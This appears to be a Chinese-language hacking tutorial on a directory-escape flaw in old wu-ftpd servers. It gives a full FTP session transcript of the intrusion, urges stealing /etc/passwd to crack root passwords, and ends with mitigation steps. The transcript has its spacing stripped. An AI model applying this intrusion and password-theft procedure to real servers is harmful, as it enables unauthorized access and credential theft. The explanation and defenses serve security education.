FTP入侵

正文

利用伺服程式的缺陷入侵系统

  FTP入侵:wu-ftpd2.x版以前安全缺陷。
  wu-ftpd2.x是WashingtonUniversity(美国华盛顿大学)所研发出来的FTP伺服程式,广泛应用在各型UNIX主机上作为FTP伺服程式。它可以接受一般的用户签入,也提供以Anonymous或ftp为名的匿名签入以开放主机上的档案供大众Download用。其2.2版本以前有一个很严重的安全缺陷:一个匿名的使用者经由下列程序也可以取得一般使用者的权限进入系统磁碟:
  1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。
  2.要求签入时,使用匿名帐号签入,但不要使用anonymous而使用FTP。
  3.在根目录下再次使用chdi/(cd/)命令,即可切换到一般系统目录而不只是公众目录。现在在此示范如何入侵网络上的一台please.hack.me主机,实例如下:(中文部分为注解)
  linux1:~#ftpplease.hack.me
  Connectedtoplease.hack.me
  220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready.
  Name(linux1.twunix.org:root):ftp
  331Guestloginok,sendyourcompleteemailaddressaspassword.
  Password:
  230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany
  230-unusualproblems,pleasereporthemviaemailtoroot@please
  230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
  230-ofyourpassword-thiswillturnoffthecontinuationmessagesthatmay
  230-beconfusingyourftpclient.
  230-
  230Guestloginok,accessrestrictionsapply.
  RemotesystemtypeisUNIX.
  Usingbinarymodetotransferfiles.
  ftp>ls-1一般匿名帐号进入后,先查看所在目录的内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  tota19
  drwxrwxr-x8rootwheel1024Sep1109:31.
  drwxrwxr-x8rootwheel1024Sep1109:31..
  drwxrwxr-x2rootwheel1024Sep1109:31bin
  drwxrwxr-x2rootwheel1024Sep1109:31etc
  drwxrwxr-x2rootwheel1024Dec31993incoming
  drwxrwxr-x2rootwheel1024Nov171993lib
  drwxrwxr-x2rootwheel1024Sep1109:31pub
  drwxrwxr-x3rootwheel1024Sep1109:31usr
  -rw-r–r–1rootroot312Aug11994welcome.msg
  226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容。
  ftp>pwd
  257"/"iscurrentdirectory.
  ftp>cd/虽然已经在根目录下,依然再次切换到/目录。
  250CWDcommandsuccessful.本来应该是要回应[无此目录]的(因为已经在最底层)但是依然可以继续切换。
  ftp>ls-1再次查验现在目录内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  total777
  drwxr-xr-x19rootroot1024ct608:58.
  drwxr-xr-x19rootroot1024ct608:58..
  drwxr-xr-x2rootbin2048Sep1117:31bin
  drwxr-xr-x2rootroot1024Sep1117:35boot
  drwxr-xr-x3rootroot2048Oct1400:03dev
  drwxr-xr-x9rootroot2048Oct1410:41etc
  drwxr-xr-x3rootroot1024Oct507:26ext
  drwxr-xr-x2rootroot1024Sep1109:42floppy
  drwxr-xr-x8rootroot1024Oct1111:52home
  drwxr-xr-x3rootroot1024Sep1117:27lib
  drwxr-xr-x2rootroot12288Sep1117:16lost+found
  drwxr-xr-x2rootroot1024Jul1013:23mnt
  dr-xr-xr-x5rootroot1408Oct408:03proc
  -rw——-1rootroot139424Sep2817:00quota.user
  drwxr-x-x3rootroot1024Sep2814:07root
  drwxr-xr-x2rootbin2048Sep1117:31sbin
  drwxr-xr-x2rootroot1024Sep1117:18shlib
  drwxrwxrwt3rootroot1024Oct1410:40tmp
  drwxr-xr-x24rootroot1024Jul81994usr
  drwxr-xr-x14rootroot1024Sep1117:32var
  -r———1rootroot596263Sep1117:33vmlinuz
  226Transfercomplete.已经变成一般系统目录了。
  ftp>
 
入侵原理解说:
  此一入侵是利用FTP公众匿名帐号anonymous,ftp其中后者的ftp正好与系统内定的FTP公众帐号名称相同,使得系统误以为ftp是一个已经登记的用户,而不是一个公众匿名帐号,而使其进入系统目录中。
  为什么会有这种现象发生呢?原来是FTP伺服程式将连线进来是使用者分为[匿名帐号]与[正式帐号]。如果是匿名帐号,则系统仅要求其输入自己的E-mail或是Ident资料当密码,就可以进入系统的/home/ftp目录中,而以/home/ftp当作此类使用者的根目录,这种用anonymous或是ftp当帐号匿名签入的使用者是没有办法切到系统目录中的(实际的/目录),再怎么下chdir/命令也只能到/home/ftp为止。
  而如果在/etc/password中登记有案的帐号,则以系统中实际的/为其根目录,此类使用者可以在其权限范围内浏览整个硬碟。
  而因为匿名帐号是以/home/ftp目录为起点,正好与ftp此一匿名帐号相同,故wu-ftpd2.x版以前的版本将会使用ftp签入的帐号视为一般User。(不过如果是用anonymous此一匿名帐号签入,就不会有这种情况了)
  使用ftp帐号并入侵到系统里面以后有什么好处呢?由于该入侵者已经可以完整浏览该硬碟,并享有一般User的权限,当然入侵者也可以进到/etc目录下,并读取passwd档案。如果该系统没有做shadow的话,那就大大方方地拿走passwd档案,然后回家利用类密码分析程式算出密码来。如果正好还破出root的密码的话,那就……嘿嘿~~~~
 
入侵防治方法:

  1.如果您的ftp伺服程式是wu-ftpd而且版本号低于2.4版,请尽快换到2.4版使用。
  2.将ftp帐号列入/ftp/ftpusers档案中,让匿名使用者只能利用anonymous此一匿名帐号签入。
  3.替系统安装ShadowPasswd。
  4.再次确认系统中没有叫做ftp或是anonymous的目录。
  5.改/etc/inetd.conf档案,关闭FTP服务。

发表评论